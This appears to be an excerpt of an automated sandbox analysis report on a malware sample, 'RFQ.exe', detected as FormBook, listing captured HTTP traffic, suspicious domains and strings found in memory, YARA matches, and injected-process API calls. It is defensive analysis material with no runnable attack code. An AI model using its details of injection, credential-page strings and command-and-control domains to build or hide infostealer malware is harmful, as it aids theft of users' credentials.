61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:59:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:59:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:59:19 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:00:08 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:00:10 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: net.exe, 0000000B.00000002.3130867153.000000000477A000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.000000000307A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: rNgGAKxrFRkFYx.exe, 0000000C.00000002.3131106553.0000000004C73000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wukong.college
                Source: rNgGAKxrFRkFYx.exe, 0000000C.00000002.3131106553.0000000004C73000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wukong.college/9ezc/
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 0000000B.00000003.1690779920.0000000008103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 0000000B.00000002.3130867153.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002EE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0045A10F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0045A10F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,1_2_0046DC80
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,1_2_0044C37A
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0047C81C

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042CA43 NtClose,7_2_0042CA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672B60 NtClose,LdrInitializeThunk,7_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036735C0 NtCreateMutant,LdrInitializeThunk,7_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03674340 NtSetContextThread,7_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03674650 NtSuspendThread,7_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BE0 NtQueryValueKey,7_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BF0 NtAllocateVirtualMemory,7_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BA0 NtEnumerateValueKey,7_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672B80 NtQueryInformationFile,7_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AF0 NtWriteFile,7_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AD0 NtReadFile,7_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AB0 NtWaitForSingleObject,7_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672F60 NtCreateProcessEx,7_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672F30 NtCreateSection,7_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672FE0 NtCreateFile,7_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672FA0 NtQuerySection,7_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672FB0 NtResumeThread,7_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672F90 NtProtectVirtualMemory,7_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672E30 NtWriteVirtualMemory,7_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672EE0 NtQueueApcThread,7_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672EA0 NtAdjustPrivilegesToken,7_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672E80 NtReadVirtualMemory,7_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672D30 NtUnmapViewOfSection,7_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672D00 NtSetInformationFile,7_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672D10 NtMapViewOfSection,7_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672DD0 NtDelayExecution,7_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672DB0 NtEnumerateKey,7_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672C60 NtCreateKey,7_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672C70 NtFreeVirtualMemory,7_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672C00 NtQueryInformationProcess,7_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672CF0 NtOpenProcess,7_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672CC0 NtQueryVirtualMemory,7_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672CA0 NtQueryInformationToken,7_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673010 NtOpenDirectoryObject,7_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673090 NtSetValueKey,7_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036739B0 NtGetContextThread,7_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673D70 NtOpenThread,7_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03673D10 NtOpenProcessToken,7_2_03673D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03924340 NtSetContextThread,LdrInitializeThunk,11_2_03924340
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03924650 NtSuspendThread,LdrInitializeThunk,11_2_03924650
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03922BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03922BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03922BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922B60 NtClose,LdrInitializeThunk,11_2_03922B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922AD0 NtReadFile,LdrInitializeThunk,11_2_03922AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922AF0 NtWriteFile,LdrInitializeThunk,11_2_03922AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922FB0 NtResumeThread,LdrInitializeThunk,11_2_03922FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922FE0 NtCreateFile,LdrInitializeThunk,11_2_03922FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922F30 NtCreateSection,LdrInitializeThunk,11_2_03922F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03922E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03922EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922DD0 NtDelayExecution,LdrInitializeThunk,11_2_03922DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03922DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03922D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03922D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03922CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03922C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922C60 NtCreateKey,LdrInitializeThunk,11_2_03922C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039235C0 NtCreateMutant,LdrInitializeThunk,11_2_039235C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039239B0 NtGetContextThread,LdrInitializeThunk,11_2_039239B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922B80 NtQueryInformationFile,11_2_03922B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922AB0 NtWaitForSingleObject,11_2_03922AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922F90 NtProtectVirtualMemory,11_2_03922F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922FA0 NtQuerySection,11_2_03922FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922F60 NtCreateProcessEx,11_2_03922F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922EA0 NtAdjustPrivilegesToken,11_2_03922EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922E30 NtWriteVirtualMemory,11_2_03922E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922DB0 NtEnumerateKey,11_2_03922DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922D00 NtSetInformationFile,11_2_03922D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922CC0 NtQueryVirtualMemory,11_2_03922CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922CF0 NtOpenProcess,11_2_03922CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03922C00 NtQueryInformationProcess,11_2_03922C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03923090 NtSetValueKey,11_2_03923090
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03923010 NtOpenDirectoryObject,11_2_03923010
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03923D10 NtOpenProcessToken,11_2_03923D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03923D70 NtOpenThread,11_2_03923D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030C9310 NtCreateFile,11_2_030C9310
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030C9780 NtAllocateVirtualMemory,11_2_030C9780
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030C9620 NtClose,11_2_030C9620
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030C9580 NtDeleteFile,11_2_030C9580
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030C9480 NtReadFile,11_2_030C9480
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,1_2_00431BE8
